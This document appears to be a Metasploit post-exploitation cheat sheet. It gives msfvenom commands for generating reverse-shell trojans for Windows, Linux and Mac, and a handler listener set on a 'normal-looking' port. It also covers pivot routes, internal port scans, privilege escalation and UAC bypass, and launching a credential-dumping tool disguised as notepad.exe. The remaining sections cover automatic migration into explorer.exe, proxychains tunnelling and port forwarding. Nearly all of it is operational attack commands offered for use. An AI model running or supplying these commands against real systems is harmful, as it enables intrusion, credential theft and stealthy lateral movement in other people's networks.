Payload (trojan) generation
Windows
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=
Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=
MSF handler (receiving the callback)
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.88.128
set LPORT 8080   (or 443 or another "normal-looking" port)
set ExitOnSession false
exploit -j -z
Adding routes
shell -> ipconfig
run get_local_subnets
route list
background -> route add 192.168.0.0 255.255.255.0 1
run autoroute -s 192.168.1.1/24
Port scanning
search portscan
use X
set rhost 192.168.1.1/24
set rport 445
set threads 10
Privilege escalation
load priv
getsystem
use post/multi/recon/local_exploit_suggester
windows/local/service_permissions
......
BypassUAC
https://www.cnblogs.com/backlion/p/10552137.html
Process masquerading
execute -H -m -d notepad.exe -f wce.exe -a -o wce.txt
Automatic process migration when the session comes in
set autorunscript migrate -n explorer.exe
set AutoRunScript migrate -f
Msf + proxychains
run autoroute -s 192.168.1.1/24
use auxiliary/server/socks4a
set srvhost 127.0.0.1
set srvport 10080
exploit
Edit the proxychains configuration (point it at the SOCKS4a proxy above)
proxychains4 nmap -sT -Pn --open 192.168.100.1/22
Note: proxychains cannot proxy ICMP packets, so the -Pn option is required, i.e. skip the host-liveness check and go straight to a TCP connect scan of the ports.
Port forwarding
portfwd add -l <local port on the MSF host> -p <target port> -r <target IP, e.g. 127.0.0.1>
portfwd delete -l <local port on the MSF host> -p <target port> -r <target IP, e.g. 127.0.0.1>
portfwd list
Setting targets from a file
set rhosts file:/root/ips.txt
Garbled (mis-encoded) output
chcp 65001